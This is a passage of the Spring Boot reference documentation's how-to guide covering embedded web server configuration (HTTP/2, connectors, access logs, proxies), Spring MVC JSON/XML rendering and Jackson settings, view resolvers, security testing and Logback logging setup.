installed on the host operating system.\n\nThe library folder must be made available, if not already, to the JVM library path. You\ncan do so with a JVM argument such as\n`-Djava.library.path=\/usr\/local\/opt\/tomcat-native\/lib`. See the\nhttps:\/\/tomcat.apache.org\/tomcat-9.0-doc\/apr.html[official Tomcat documentation] for more\ndetails.\n\nStarting Tomcat 9.0.x on JDK 8 without that native support logs the following error:\n\n[indent=0,subs=\"attributes\"]\n----\n\tERROR 8787 --- [ main] o.a.coyote.http11.Http11NioProtocol : The upgrade handler [org.apache.coyote.http2.Http2Protocol] for [h2] only supports upgrade via ALPN but has been configured for the [\"https-jsse-nio-8443\"] connector that does not support ALPN.\n----\n\nThis error is not fatal, and the application still starts with HTTP\/1.1 SSL support.\n\n\n\n[[howto-configure-http2-netty]]\n==== HTTP\/2 with Reactor Netty\nThe `spring-boot-starter-webflux` starter uses Reactor Netty as a server by default.\nReactor Netty can be configured for HTTP\/2 using the JDK support with JDK 9 or later.\nFor JDK 8 environments, or for optimal runtime performance, this server also supports\nHTTP\/2 with native libraries. To enable that, your application needs to have an\nadditional dependency.\n\nSpring Boot manages the version for the\n`io.netty:netty-tcnative-boringssl-static` \"uber jar\", containing native libraries for\nall platforms. 
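\nA minimal Maven sketch of adding that dependency (no version is needed, since Spring Boot manages it):\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>io.netty<\/groupId>\n\t\t<artifactId>netty-tcnative-boringssl-static<\/artifactId>\n\t<\/dependency>\n----\n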
Developers can choose to import only the required dependencies using\na classifier (see https:\/\/netty.io\/wiki\/forked-tomcat-native.html[the Netty official\ndocumentation]).\n\n\n\n[[howto-configure-webserver]]\n=== Configure the Web Server\n\nGenerally, you should first consider using one of the many available configuration keys\nand customizing your web server by adding new entries in your `application.properties` (or\n`application.yml`, or the environment; see\n\"`<<howto-discover-build-in-options-for-external-properties>>`\"). The `server.{asterisk}`\nnamespace is quite useful here, and it includes namespaces like `server.tomcat.{asterisk}`,\n`server.jetty.{asterisk}`, and others, for server-specific features.\nSee the list of <<common-application-properties>>.\n\nThe previous sections already covered many common use cases, such as compression, SSL,\nor HTTP\/2. However, if a configuration key does not exist for your use case, you should\nlook at\n{dc-spring-boot}\/web\/server\/WebServerFactoryCustomizer.html[`WebServerFactoryCustomizer`].\nYou can declare such a component and get access to the server factory relevant to your\nchoice: you should select the variant for the chosen server (Tomcat, Jetty, Reactor Netty,\nUndertow) and the chosen web stack (Servlet or Reactive).\n\nThe following example is for Tomcat with the `spring-boot-starter-web` (Servlet stack):\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Component\n\tpublic class MyTomcatWebServerCustomizer\n\t\t\timplements WebServerFactoryCustomizer<TomcatServletWebServerFactory> {\n\n\t\t@Override\n\t\tpublic void customize(TomcatServletWebServerFactory factory) {\n\t\t\t\/\/ customize the factory here\n\t\t}\n\t}\n----\n\nIn addition, Spring Boot provides:\n\n[[howto-configure-webserver-customizers]]\n[cols=\"1,2,2\", options=\"header\"]\n|===\n| Server | Servlet stack | Reactive stack\n\n| Tomcat\n| `TomcatServletWebServerFactory`\n| `TomcatReactiveWebServerFactory`\n\n| Jetty\n| `JettyServletWebServerFactory`\n| `JettyReactiveWebServerFactory`\n\n| Undertow\n| `UndertowServletWebServerFactory`\n| `UndertowReactiveWebServerFactory`\n\n| Reactor\n| N\/A\n| `NettyReactiveWebServerFactory`\n\n|===\n\nOnce you have access to a `WebServerFactory`, you can often add customizers to it to\nconfigure specific parts, such as connectors, server resources, or the server itself, all\nusing server-specific APIs.\n\nAs a last resort, you can also declare your own `WebServerFactory` component, which\noverrides the one provided by Spring Boot. In this case, you can no longer rely on\nconfiguration properties in the `server` namespace.\n\n\n\n[[howto-add-a-servlet-filter-or-listener]]\n=== Add a Servlet, Filter, or Listener to an Application\nIn a servlet stack application (that is, with the `spring-boot-starter-web`), there are two\nways to add `Servlet`, `Filter`, `ServletContextListener`, and the other listeners\nsupported by the Servlet API to your application:\n\n* <<howto-add-a-servlet-filter-or-listener-as-spring-bean>>\n* <<howto-add-a-servlet-filter-or-listener-using-scanning>>\n\n\n\n[[howto-add-a-servlet-filter-or-listener-as-spring-bean]]\n==== Add a Servlet, Filter, or Listener by Using a Spring Bean\nTo add a `Servlet`, `Filter`, or Servlet `*Listener` by using a Spring bean, you must\nprovide a `@Bean` definition for it. Doing so can be very useful when you want to inject\nconfiguration or dependencies. 
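\nAs an illustration, the following minimal sketch registers a hypothetical `AuditFilter` as a plain bean and injects another bean into it (both class names are assumptions):\n\n[source,java,indent=0]\n----\n\t\/\/ AuditFilter (a Filter implementation) and AuditService are hypothetical application classes\n\t@Bean\n\tpublic AuditFilter auditFilter(AuditService auditService) {\n\t\t\/\/ Because the bean is a Filter, it is registered with the servlet container automatically\n\t\treturn new AuditFilter(auditService);\n\t}\n----\n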
However, you must be very careful that they do not cause\neager initialization of too many other beans, because they have to be installed in the\ncontainer very early in the application lifecycle. (For example, it is not a good idea to\nhave them depend on your `DataSource` or JPA configuration.) You can work around such\nrestrictions by initializing the beans lazily when first used instead of on\ninitialization.\n\nIn the case of `Filters` and `Servlets`, you can also add mappings and init parameters by\nadding a `FilterRegistrationBean` or a `ServletRegistrationBean` instead of or in\naddition to the underlying component.\n\n[NOTE]\n====\nIf no `dispatcherType` is specified on a filter registration, `REQUEST` is used. This\naligns with the Servlet Specification's default dispatcher type.\n====\n\nLike any other Spring bean, you can define the order of Servlet filter beans; please\nmake sure to check the\n\"`<<spring-boot-features.adoc#boot-features-embedded-container-servlets-filters-listeners-beans>>`\"\nsection.\n\n\n\n[[howto-disable-registration-of-a-servlet-or-filter]]\n===== Disable Registration of a Servlet or Filter\nAs <<howto-add-a-servlet-filter-or-listener-as-spring-bean,described earlier>>, any\n`Servlet` or `Filter` beans are registered with the servlet container automatically. To\ndisable registration of a particular `Filter` or `Servlet` bean, create a registration\nbean for it and mark it as disabled, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic FilterRegistrationBean registration(MyFilter filter) {\n\t\tFilterRegistrationBean registration = new FilterRegistrationBean(filter);\n\t\tregistration.setEnabled(false);\n\t\treturn registration;\n\t}\n----\n\n\n\n[[howto-add-a-servlet-filter-or-listener-using-scanning]]\n==== Add Servlets, Filters, and Listeners by Using Classpath Scanning\n`@WebServlet`, `@WebFilter`, and `@WebListener` annotated classes can be automatically\nregistered with an embedded servlet container by annotating a `@Configuration` class\nwith `@ServletComponentScan` and specifying the package(s) containing the components\nthat you want to register. By default, `@ServletComponentScan` scans from the package\nof the annotated class.\n\n\n\n[[howto-configure-accesslogs]]\n=== Configure Access Logging\nAccess logs can be configured for Tomcat, Undertow, and Jetty through their respective\nnamespaces.\n\nFor instance, the following settings log access on Tomcat with a\n{tomcat-documentation}\/config\/valve.html#Access_Logging[custom pattern].\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.tomcat.basedir=my-tomcat\n\tserver.tomcat.accesslog.enabled=true\n\tserver.tomcat.accesslog.pattern=%t %a \"%r\" %s (%D ms)\n----\n\nNOTE: The default location for logs is a `logs` directory relative to the Tomcat base\ndirectory. By default, the `logs` directory is a temporary directory, so you may want to\nfix Tomcat's base directory or use an absolute path for the logs. 
In the preceding\nexample, the logs are available in `my-tomcat\/logs` relative to the working directory of\nthe application.\n\nAccess logging for Undertow can be configured in a similar fashion, as shown in the\nfollowing example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.undertow.accesslog.enabled=true\n\tserver.undertow.accesslog.pattern=%t %a \"%r\" %s (%D ms)\n----\n\nLogs are stored in a `logs` directory relative to the working directory of the\napplication. You can customize this location by setting the\n`server.undertow.accesslog.dir` property.\n\nFinally, access logging for Jetty can also be configured as follows:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.jetty.accesslog.enabled=true\n\tserver.jetty.accesslog.filename=\/var\/log\/jetty-access.log\n----\n\nBy default, logs are redirected to `System.err`. For more details, see\n{jetty-documentation}\/configuring-jetty-request-logs.html[the Jetty documentation].\n\n\n\n[[howto-use-behind-a-proxy-server]]\n[[howto-use-tomcat-behind-a-proxy-server]]\n=== Running Behind a Front-end Proxy Server\nYour application might need to send `302` redirects or render content with absolute links\nback to itself. When running behind a proxy, the caller wants a link to the proxy and not\nto the physical address of the machine hosting your app. Typically, such situations are\nhandled through a contract with the proxy, which adds headers to tell the back end how to\nconstruct links to itself.\n\nIf the proxy adds conventional `X-Forwarded-For` and `X-Forwarded-Proto` headers (most\nproxy servers do so), the absolute links should be rendered correctly, provided\n`server.use-forward-headers` is set to `true` in your `application.properties`.\n\nNOTE: If your application runs in Cloud Foundry or Heroku, the\n`server.use-forward-headers` property defaults to `true`. In all\nother instances, it defaults to `false`.\n\n\n\n[[howto-customize-tomcat-behind-a-proxy-server]]\n==== Customize Tomcat's Proxy Configuration\nIf you use Tomcat, you can additionally configure the names of the headers used to\ncarry \"`forwarded`\" information, as shown in the following example:\n\n[indent=0]\n----\n\tserver.tomcat.remote-ip-header=x-your-remote-ip-header\n\tserver.tomcat.protocol-header=x-your-protocol-header\n----\n\nTomcat is also configured with a default regular expression that matches internal\nproxies that are to be trusted. By default, IP addresses in `10\/8`, `192.168\/16`,\n`169.254\/16` and `127\/8` are trusted. You can customize the valve's configuration by\nadding an entry to `application.properties`, as shown in the following example:\n\n[indent=0]\n----\n\tserver.tomcat.internal-proxies=192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\n----\n\nNOTE: The double backslashes are required only when you use a properties file for\nconfiguration. 
If you use YAML, single backslashes are sufficient, and a value\nequivalent to that shown in the preceding example would be `192\\.168\\.\\d{1,3}\\.\\d{1,3}`.\n\nNOTE: You can trust all proxies by setting the `internal-proxies` to empty (but do not do\nso in production).\n\nYou can take complete control of the configuration of Tomcat's `RemoteIpValve` by\nswitching the automatic one off (to do so, set `server.use-forward-headers=false`) and\nadding a new valve instance in a `TomcatServletWebServerFactory` bean.\n\n\n\n[[howto-enable-multiple-connectors-in-tomcat]]\n=== Enable Multiple Connectors with Tomcat\nYou can add an `org.apache.catalina.connector.Connector` to the\n`TomcatServletWebServerFactory`, which can allow multiple connectors, including HTTP and\nHTTPS connectors, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic ServletWebServerFactory servletContainer() {\n\t\tTomcatServletWebServerFactory tomcat = new TomcatServletWebServerFactory();\n\t\ttomcat.addAdditionalTomcatConnectors(createSslConnector());\n\t\treturn tomcat;\n\t}\n\n\tprivate Connector createSslConnector() {\n\t\tConnector connector = new Connector(\"org.apache.coyote.http11.Http11NioProtocol\");\n\t\tHttp11NioProtocol protocol = (Http11NioProtocol) connector.getProtocolHandler();\n\t\ttry {\n\t\t\tFile keystore = new ClassPathResource(\"keystore\").getFile();\n\t\t\tFile truststore = new ClassPathResource(\"keystore\").getFile();\n\t\t\tconnector.setScheme(\"https\");\n\t\t\tconnector.setSecure(true);\n\t\t\tconnector.setPort(8443);\n\t\t\tprotocol.setSSLEnabled(true);\n\t\t\tprotocol.setKeystoreFile(keystore.getAbsolutePath());\n\t\t\tprotocol.setKeystorePass(\"changeit\");\n\t\t\tprotocol.setTruststoreFile(truststore.getAbsolutePath());\n\t\t\tprotocol.setTruststorePass(\"changeit\");\n\t\t\tprotocol.setKeyAlias(\"apitester\");\n\t\t\treturn connector;\n\t\t}\n\t\tcatch (IOException ex) {\n\t\t\tthrow new IllegalStateException(\"can't access keystore: [\" + \"keystore\"\n\t\t\t\t\t+ \"] or truststore: [\" + \"keystore\" + \"]\", ex);\n\t\t}\n\t}\n----\n\n\n\n[[howto-use-tomcat-legacycookieprocessor]]\n=== Use Tomcat's LegacyCookieProcessor\nBy default, the embedded Tomcat used by Spring Boot does not support \"Version 0\" of the\nCookie format, so you may see the following error:\n\n[indent=0]\n----\n\tjava.lang.IllegalArgumentException: An invalid character [32] was present in the Cookie value\n----\n\nIf at all possible, you should consider updating your code to only store values\ncompliant with later Cookie specifications. If, however, you cannot change the\nway that cookies are written, you can instead configure Tomcat to use a\n`LegacyCookieProcessor`. 
To switch to the `LegacyCookieProcessor`, use a
`WebServerFactoryCustomizer` bean that adds a `TomcatContextCustomizer`, as shown
in the following example:

[source,java,indent=0]
----
include::{code-examples}/context/embedded/TomcatLegacyCookieProcessorExample.java[tag=customizer]
----



[[howto-enable-multiple-listeners-in-undertow]]
=== Enable Multiple Listeners with Undertow
Add an `UndertowBuilderCustomizer` to the `UndertowServletWebServerFactory` and
add a listener to the `Builder`, as shown in the following example:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@Bean
	public UndertowServletWebServerFactory servletWebServerFactory() {
		UndertowServletWebServerFactory factory = new UndertowServletWebServerFactory();
		factory.addBuilderCustomizers(new UndertowBuilderCustomizer() {

			@Override
			public void customize(Builder builder) {
				builder.addHttpListener(8080, "0.0.0.0");
			}

		});
		return factory;
	}
----



[[howto-create-websocket-endpoints-using-serverendpoint]]
=== Create WebSocket Endpoints Using @ServerEndpoint
If you want to use `@ServerEndpoint` in a Spring Boot application that uses an embedded
container, you must declare a single `ServerEndpointExporter` `@Bean`, as shown in the
following example:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@Bean
	public ServerEndpointExporter serverEndpointExporter() {
		return new ServerEndpointExporter();
	}
----

The bean shown in the preceding example registers any `@ServerEndpoint` annotated beans
with the underlying WebSocket container. When deployed to a standalone servlet container,
this role is performed by a servlet container initializer, and the
`ServerEndpointExporter` bean is not required.



[[howto-spring-mvc]]
== Spring MVC

Spring Boot has a number of starters that include Spring MVC. Note that some starters
include a dependency on Spring MVC rather than include it directly. This section answers
common questions about Spring MVC and Spring Boot.

[[howto-write-a-json-rest-service]]
=== Write a JSON REST Service
Any Spring `@RestController` in a Spring Boot application should render JSON responses by
default, as long as Jackson2 is on the classpath, as shown in the following example:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@RestController
	public class MyController {

		@RequestMapping("/thing")
		public MyThing thing() {
			return new MyThing();
		}

	}
----

As long as `MyThing` can be serialized by Jackson2 (true for a normal POJO or Groovy
object), then `http://localhost:8080/thing` serves a JSON representation of it by
default. Note that, in a browser, you might sometimes see XML responses, because browsers
tend to send accept headers that prefer XML.



[[howto-write-an-xml-rest-service]]
=== Write an XML REST Service
If you have the Jackson XML extension (`jackson-dataformat-xml`) on the classpath, you
can use it to render XML responses. The previous example that we used for JSON would
work.
To use the Jackson XML renderer, add the following dependency to your project:

[source,xml,indent=0,subs="verbatim,quotes,attributes"]
----
	<dependency>
		<groupId>com.fasterxml.jackson.dataformat</groupId>
		<artifactId>jackson-dataformat-xml</artifactId>
	</dependency>
----

If Jackson's XML extension is not available and JAXB is available, XML can be rendered
with the additional requirement of having `MyThing` annotated as `@XmlRootElement`, as
shown in the following example:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@XmlRootElement
	public class MyThing {
		private String name;
		// .. getters and setters
	}
----

JAXB is only available out of the box with Java 8. If you use a more recent Java
version, add the following dependency to your project:

[source,xml,indent=0,subs="verbatim,quotes,attributes"]
----
	<dependency>
		<groupId>org.glassfish.jaxb</groupId>
		<artifactId>jaxb-runtime</artifactId>
	</dependency>
----

NOTE: To get the server to render XML instead of JSON, you might have to send an
`Accept: text/xml` header (or use a browser).



[[howto-customize-the-jackson-objectmapper]]
=== Customize the Jackson ObjectMapper
Spring MVC (client and server side) uses `HttpMessageConverters` to negotiate content
conversion in an HTTP exchange. If Jackson is on the classpath, you already get the
default converter(s) provided by `Jackson2ObjectMapperBuilder`, an instance of which
is auto-configured for you.

The `ObjectMapper` (or `XmlMapper` for the Jackson XML converter) instance (created by
default) has the following customized properties:

* `MapperFeature.DEFAULT_VIEW_INCLUSION` is disabled
* `DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES` is disabled
* `SerializationFeature.WRITE_DATES_AS_TIMESTAMPS` is disabled

Spring Boot also has some features to make it easier to customize this behavior.

You can configure the `ObjectMapper` and `XmlMapper` instances by using the environment.
Jackson provides an extensive suite of simple on/off features that can be used to
configure various aspects of its processing.
These features are described in six enums (in\nJackson) that map onto properties in the environment:\n\n|===\n|Enum|Property|Values\n\n|`com.fasterxml.jackson.databind.DeserializationFeature`\n|`spring.jackson.deserialization.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.core.JsonGenerator.Feature`\n|`spring.jackson.generator.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.databind.MapperFeature`\n|`spring.jackson.mapper.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.core.JsonParser.Feature`\n|`spring.jackson.parser.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.databind.SerializationFeature`\n|`spring.jackson.serialization.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.annotation.JsonInclude.Include`\n|`spring.jackson.default-property-inclusion`\n|`always`, `non_null`, `non_absent`, `non_default`, `non_empty`\n|===\n\nFor example, to enable pretty print, set `spring.jackson.serialization.indent_output=true`.\nNote that, thanks to the use of <<boot-features-external-config-relaxed-binding,\nrelaxed binding>>, the case of `indent_output` does not have to match the case of the\ncorresponding enum constant, which is `INDENT_OUTPUT`.\n\nThis environment-based configuration is applied to the auto-configured\n`Jackson2ObjectMapperBuilder` bean and applies to any mappers created by\nusing the builder, including the auto-configured `ObjectMapper` bean.\n\nThe context's `Jackson2ObjectMapperBuilder` can be customized by one or more\n`Jackson2ObjectMapperBuilderCustomizer` beans. Such customizer beans can be ordered\n(Boot's own customizer has an order of 0), letting additional customization be applied\nboth before and after Boot's customization.\n\nAny beans of type `com.fasterxml.jackson.databind.Module` are automatically registered\nwith the auto-configured `Jackson2ObjectMapperBuilder` and are applied to any `ObjectMapper`\ninstances that it creates. This provides a global mechanism for contributing custom\nmodules when you add new features to your application.\n\nIf you want to replace the default `ObjectMapper` completely, either define a `@Bean` of\nthat type and mark it as `@Primary` or, if you prefer the builder-based\napproach, define a `Jackson2ObjectMapperBuilder` `@Bean`. Note that, in either case,\ndoing so disables all auto-configuration of the `ObjectMapper`.\n\nIf you provide any `@Beans` of type `MappingJackson2HttpMessageConverter`,\nthey replace the default value in the MVC configuration. Also, a convenience bean of type\n`HttpMessageConverters` is provided (and is always available if you use the default MVC\nconfiguration). It has some useful methods to access the default and user-enhanced\nmessage converters.\n\nSee the \"`<<howto-customize-the-responsebody-rendering>>`\" section and the\n{sc-spring-boot-autoconfigure}\/web\/servlet\/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`]\nsource code for more details.\n\n\n\n[[howto-customize-the-responsebody-rendering]]\n=== Customize the @ResponseBody Rendering\nSpring uses `HttpMessageConverters` to render `@ResponseBody` (or responses from\n`@RestController`). You can contribute additional converters by adding beans of the\nappropriate type in a Spring Boot context. If a bean you add is of a type that would have\nbeen included by default anyway (such as `MappingJackson2HttpMessageConverter` for JSON\nconversions), it replaces the default value. 
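
For example, the following sketch contributes Spring's `BufferedImageHttpMessageConverter`
(which Spring Boot does not register by default); the bean method name is illustrative:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	// Any bean of type HttpMessageConverter is added to the converter list
	@Bean
	public HttpMessageConverter<BufferedImage> bufferedImageConverter() {
		return new BufferedImageHttpMessageConverter();
	}
----
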
A convenience bean of type
`HttpMessageConverters` is provided and is always available if you use the default MVC
configuration. It has some useful methods to access the default and user-enhanced message
converters (for example, if you want to inject them manually into a custom
`RestTemplate`).

As in normal MVC usage, any `WebMvcConfigurer` beans that you provide can also
contribute converters by overriding the `configureMessageConverters` method. However, unlike
with normal MVC, you can supply only the additional converters that you need (because Spring
Boot uses the same mechanism to contribute its defaults). Finally, if you opt out of the
Spring Boot default MVC configuration by providing your own `@EnableWebMvc` configuration,
you can take control completely and do everything manually by using
`getMessageConverters` from `WebMvcConfigurationSupport`.

See the
{sc-spring-boot-autoconfigure}/web/servlet/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`]
source code for more details.



[[howto-multipart-file-upload-configuration]]
=== Handling Multipart File Uploads
Spring Boot embraces the Servlet 3 `javax.servlet.http.Part` API to support uploading
files. By default, Spring Boot configures Spring MVC with a maximum size of 1MB per
file and a maximum of 10MB of file data in a single request. You may override these
values, the location to which intermediate data is stored (for example, to the `/tmp`
directory), and the threshold past which data is flushed to disk by using the properties
exposed in the `MultipartProperties` class. For example, if you want to specify that
files be unlimited, set the `spring.servlet.multipart.max-file-size` property to `-1`.

The multipart support is helpful when you want to receive multipart encoded file data as
a `@RequestParam`-annotated parameter of type `MultipartFile` in a Spring MVC controller
handler method.

See the
{sc-spring-boot-autoconfigure}/web/servlet/MultipartAutoConfiguration.{sc-ext}[`MultipartAutoConfiguration`]
source for more details.

NOTE: It is recommended to use the container's built-in support for multipart uploads
rather than introducing an additional dependency such as Apache Commons File Upload.



[[howto-switch-off-the-spring-mvc-dispatcherservlet]]
=== Switch Off the Spring MVC DispatcherServlet
By default, all content is served from the root of your application (`/`). If you
would rather map to a different path, you can configure one as follows:

[source,properties,indent=0,subs="verbatim"]
----
	spring.mvc.servlet.path=/acme
----

If you have additional servlets, you can declare a `@Bean` of type `Servlet` or
`ServletRegistrationBean` for each, and Spring Boot registers them transparently with the
container. Because servlets are registered that way, they can be mapped to a sub-context
of the `DispatcherServlet` without invoking it.

Configuring the `DispatcherServlet` yourself is unusual, but if you really need to do it, a
`@Bean` of type `DispatcherServletPath` must be provided as well to provide the path of
your custom `DispatcherServlet`.



[[howto-switch-off-default-mvc-configuration]]
=== Switch Off the Default MVC Configuration
The easiest way to take complete control over MVC configuration is to provide your own
`@Configuration` with the `@EnableWebMvc` annotation.
Doing so leaves all MVC
configuration in your hands.



[[howto-customize-view-resolvers]]
=== Customize ViewResolvers
A `ViewResolver` is a core component of Spring MVC, translating view names in
`@Controller` to actual `View` implementations. Note that `ViewResolvers` are mainly
used in UI applications, rather than REST-style services (a `View` is not used to render
a `@ResponseBody`). There are many implementations of `ViewResolver` to choose from, and
Spring on its own is not opinionated about which ones you should use. Spring Boot, on the
other hand, installs one or two for you, depending on what it finds on the classpath and
in the application context. The `DispatcherServlet` uses all the resolvers it finds in
the application context, trying each one in turn until it gets a result, so, if you
add your own, you have to be aware of the order and of the position at which your
resolver is added.

`WebMvcAutoConfiguration` adds the following `ViewResolvers` to your context:

* An `InternalResourceViewResolver` named '`defaultViewResolver`'. This one locates
physical resources that can be rendered by using the `DefaultServlet` (including static
resources and JSP pages, if you use those). It applies a prefix and a suffix to the
view name and then looks for a physical resource with that path in the servlet context
(the defaults are both empty but are accessible for external configuration through
`spring.mvc.view.prefix` and `spring.mvc.view.suffix`). You can override it by
providing a bean of the same type.
* A `BeanNameViewResolver` named '`beanNameViewResolver`'. This is a useful member of the
view resolver chain and picks up any beans with the same name as the `View` being
resolved. It should not be necessary to override or replace it.
* A `ContentNegotiatingViewResolver` named '`viewResolver`' is added only if there *are*
actually beans of type `View` present. This is a '`master`' resolver, delegating to all
the others and attempting to find a match to the '`Accept`' HTTP header sent by the
client. There is a useful
https://spring.io/blog/2013/06/03/content-negotiation-using-views[blog about
`ContentNegotiatingViewResolver`] that you might like to study to learn more, and you
might also look at the source code for detail. You can switch off the auto-configured
`ContentNegotiatingViewResolver` by defining a bean named '`viewResolver`'.
* If you use Thymeleaf, you also have a `ThymeleafViewResolver` named
'`thymeleafViewResolver`'. It looks for resources by surrounding the view name with a
prefix and suffix. The prefix is `spring.thymeleaf.prefix`, and the suffix is
`spring.thymeleaf.suffix`. The values of the prefix and suffix default to
'`classpath:/templates/`' and '`.html`', respectively. You can override
`ThymeleafViewResolver` by providing a bean of the same name.
* If you use FreeMarker, you also have a `FreeMarkerViewResolver` named
'`freeMarkerViewResolver`'. It looks for resources in a loader path (which is
externalized to `spring.freemarker.templateLoaderPath` and has a default value of
'`classpath:/templates/`') by surrounding the view name with a prefix and a suffix. The
prefix is externalized to `spring.freemarker.prefix`, and the suffix is externalized to
`spring.freemarker.suffix`. The default values of the prefix and suffix are empty and
'`.ftl`', respectively.
You can override `FreeMarkerViewResolver` by providing a bean
of the same name.
* If you use Groovy templates (actually, if `groovy-templates` is on your classpath), you
also have a `GroovyMarkupViewResolver` named '`groovyMarkupViewResolver`'. It looks for
resources in a loader path by surrounding the view name with a prefix and suffix
(externalized to `spring.groovy.template.prefix` and `spring.groovy.template.suffix`).
The prefix and suffix have default values of '`classpath:/templates/`' and '`.tpl`',
respectively. You can override `GroovyMarkupViewResolver` by providing a bean of the
same name.

For more detail, see the following sections:

* {sc-spring-boot-autoconfigure}/web/servlet/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`]
* {sc-spring-boot-autoconfigure}/thymeleaf/ThymeleafAutoConfiguration.{sc-ext}[`ThymeleafAutoConfiguration`]
* {sc-spring-boot-autoconfigure}/freemarker/FreeMarkerAutoConfiguration.{sc-ext}[`FreeMarkerAutoConfiguration`]
* {sc-spring-boot-autoconfigure}/groovy/template/GroovyTemplateAutoConfiguration.{sc-ext}[`GroovyTemplateAutoConfiguration`]



[[howto-use-test-with-spring-security]]
== Testing With Spring Security
Spring Security provides support for running tests as a specific user.
For example, the test in the snippet below runs with an authenticated user
that has the `ADMIN` role.

[source,java,indent=0]
----
	@Test
	@WithMockUser(roles="ADMIN")
	public void requestProtectedUrlWithUser() throws Exception {
		mvc
			.perform(get("/"))
			...
	}
----

Spring Security provides comprehensive integration with Spring MVC Test, and this can
also be used when testing controllers with the `@WebMvcTest` slice and `MockMvc`.

For additional details on Spring Security's testing support, refer to Spring Security's
https://docs.spring.io/spring-security/site/docs/current/reference/htmlsingle/#test[reference documentation].



[[howto-jersey]]
== Jersey



[[howto-jersey-spring-security]]
=== Secure Jersey Endpoints with Spring Security
Spring Security can be used to secure a Jersey-based web application in much the same
way as it can be used to secure a Spring MVC-based web application. However, if you want
to use Spring Security's method-level security with Jersey, you must configure Jersey to
use `setStatus(int)` rather than `sendError(int)`. This prevents Jersey from committing the
response before Spring Security has had an opportunity to report an authentication or
authorization failure to the client.

The `jersey.config.server.response.setStatusOverSendError` property must be set to `true`
on the application's `ResourceConfig` bean, as shown in the following example:

[source,java,indent=0]
----
include::{code-examples}/jersey/JerseySetStatusOverSendErrorExample.java[tag=resource-config]
----



[[howto-http-clients]]
== HTTP Clients

Spring Boot offers a number of starters that work with HTTP clients. This section answers
questions related to using them.

[[howto-http-clients-proxy-configuration]]
=== Configure RestTemplate to Use a Proxy
As described in <<spring-boot-features.adoc#boot-features-resttemplate-customization>>,
you can use a `RestTemplateCustomizer` with `RestTemplateBuilder` to build a customized
`RestTemplate`. This is the recommended approach for creating a `RestTemplate` configured
to use a proxy.

The exact details of the proxy configuration depend on the underlying client request
factory that is being used.
The following example configures\n`HttpComponentsClientRequestFactory` with an `HttpClient` that uses a proxy for all hosts\nexcept `192.168.0.5`:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/web\/client\/RestTemplateProxyCustomizationExample.java[tag=customizer]\n----\n\n\n\n[[howto-logging]]\n== Logging\n\nSpring Boot has no mandatory logging dependency, except for the Commons Logging API, which\nis typically provided by Spring Framework's `spring-jcl` module. To use\nhttps:\/\/logback.qos.ch[Logback], you need to include it and `spring-jcl` on the classpath.\nThe simplest way to do that is through the starters, which all depend on\n`spring-boot-starter-logging`. For a web application, you need only\n`spring-boot-starter-web`, since it depends transitively on the logging starter. If you\nuse Maven, the following dependency adds logging for you:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t<\/dependency>\n----\n\nSpring Boot has a `LoggingSystem` abstraction that attempts to configure logging based on\nthe content of the classpath. If Logback is available, it is the first choice.\n\nIf the only change you need to make to logging is to set the levels of various loggers,\nyou can do so in `application.properties` by using the \"logging.level\" prefix, as shown\nin the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tlogging.level.org.springframework.web=DEBUG\n\tlogging.level.org.hibernate=ERROR\n----\n\nYou can also set the location of a file to which to write the log (in addition to the\nconsole) by using \"logging.file\".\n\nTo configure the more fine-grained settings of a logging system, you need to use the native\nconfiguration format supported by the `LoggingSystem` in question. By default, Spring Boot\npicks up the native configuration from its default location for the system (such as\n`classpath:logback.xml` for Logback), but you can set the location of the config file by\nusing the \"logging.config\" property.\n\n\n\n[[howto-configure-logback-for-logging]]\n=== Configure Logback for Logging\nIf you put a `logback.xml` in the root of your classpath, it is picked up from there (or\nfrom `logback-spring.xml`, to take advantage of the templating features provided by\nBoot). 
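
For example, assuming the `<springProfile>` extension element that the `-spring` variant
enables, a sketch such as the following (placed inside the `<configuration>` element)
applies a logger level only when the `dev` profile is active:

[source,xml,indent=0,subs="verbatim,quotes,attributes"]
----
	<springProfile name="dev">
		<logger name="org.springframework.web" level="DEBUG"/>
	</springProfile>
----
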
Spring Boot provides a default base configuration that you can include if you
want to set levels, as shown in the following example:

[source,xml,indent=0,subs="verbatim,quotes,attributes"]
----
	<?xml version="1.0" encoding="UTF-8"?>
	<configuration>
		<include resource="org/springframework/boot/logging/logback/base.xml"/>
		<logger name="org.springframework.web" level="DEBUG"/>
	</configuration>
----

If you look at `base.xml` in the spring-boot jar, you can see that it uses
some useful System properties that the `LoggingSystem` takes care of creating for you:

* `$\{PID}`: The current process ID.
* `$\{LOG_FILE}`: The value of `logging.file`, if it was set in Boot's external
 configuration.
